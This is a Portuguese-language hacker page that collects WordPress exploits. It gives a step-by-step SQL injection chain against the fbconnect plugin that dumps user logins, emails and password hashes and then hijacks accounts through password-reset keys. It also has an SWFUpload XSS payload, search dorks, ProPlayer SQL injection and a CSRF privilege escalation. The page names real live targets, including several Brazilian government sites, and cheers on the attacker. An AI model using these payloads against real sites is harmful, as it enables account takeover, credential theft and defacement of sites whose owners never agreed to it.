Exploit Wordpress fbconnect_action pei pei pei

Exploit Wordpress

DORK['1']:inurl:"/?fbconnect_action=myhome"


http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]

EXPLOIT:
Mostrando user,email,senha(user_login,user_email,user_pass):
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--


Com o email do usuário em mãos, vá até o painel de administrador.

http://VULL.COM/wp-login.php
"click em Lost your password ?"
É peça uma nova senha enviando para o e-mail.


Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa​

http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--


Vamos modificar a senha do usuario com a KEY CAPTURADA

http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
USANDO:
http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA

Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.


EXEMPLO:
http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--

Dork SWFUpload xss Wordpress.

Dork SWFUpload  XSS Wordpress.

SWFUpload é uma biblioteca JavaScript que envolve a função de upload do Flash Player. Traz seus uploads para o próximo nível com lima múltipla escolha, Upload Progress e do lado do cliente Tamanho do Arquivo Verificação.

Ao contrário de outras ferramentas de upload em Flash, SWFUpload deixa a UI nas mãos do desenvolvedor. Usando um conjunto de manipuladores de eventos de exibição desenvolvedores podem fazer upload de seu próprio progresso e status para o usuário em HTML / CSS UI.

https://code.google.com/p/swfupload/

http://www.creci-rj.gov.br/blog/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/17619_578030248914367_872807557_n.jpg

http://rosariodalimeira.mg.gov.br/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/17619_578030248914367_872807557_n.jpg

http://www.jumirim.sp.gov.br/jumirim/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/17619_578030248914367_872807557_n.jpg

http://www.tvguanandi.com.br/TVGuanandi/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=https://fbcdn-sphotos-d-a.akamaihd.net/hphotos-ak-prn1/17619_578030248914367_872807557_n.jpg

DORK: site:.gov.br  +inurl:wp-includes/js/swfupload/

Exemplo: 

site:Domínio   +inurl:wp-includes/js/swfupload/

WordPress ProPlayer Plugin Injeção de SQL

 

 

##############################################################################

# Versão : 4.7.9.1

#

# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=

#

#

##############################################################################

#LOCAL:site/wp-content/plugins/proplayer/playlist-controller.php?id=[INJEÇÃO-SQL]

#

#

# Exemplo:

# http://server/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27

##############################################################################

 

Exploit WP função do usuário Editor de CSRF

# Exploit Título: WP função do usuário Editor de CSRF
# Data: 19/5/13
# Exploit Autor: Henry Hoggard
# Autor Website: http://henryhoggard.co.uk
# Vendedor Homepage:https://wordpress.org/support/plugin/user-role-editor
# Software Link:https://wordpress.org/support/plugin/user-role-editor
# Versão: < =3 .12
# Provado on: Debian
# CVE : none yet

Dev notificado: 16/05/13
Patch lançado (3.14): 17/05/13

Descrição:
Isso permite que você se inscrever com privilégios de administrador, se você fizer o administrador
visitar o seu roteiro CSRF.

WP da Versão: < =3 .12
Exemplo de url:
"http://server_vulneravel/wordpress/wp-admin/users.php?page=user-role-editor.php&action=default&user_role=administrator"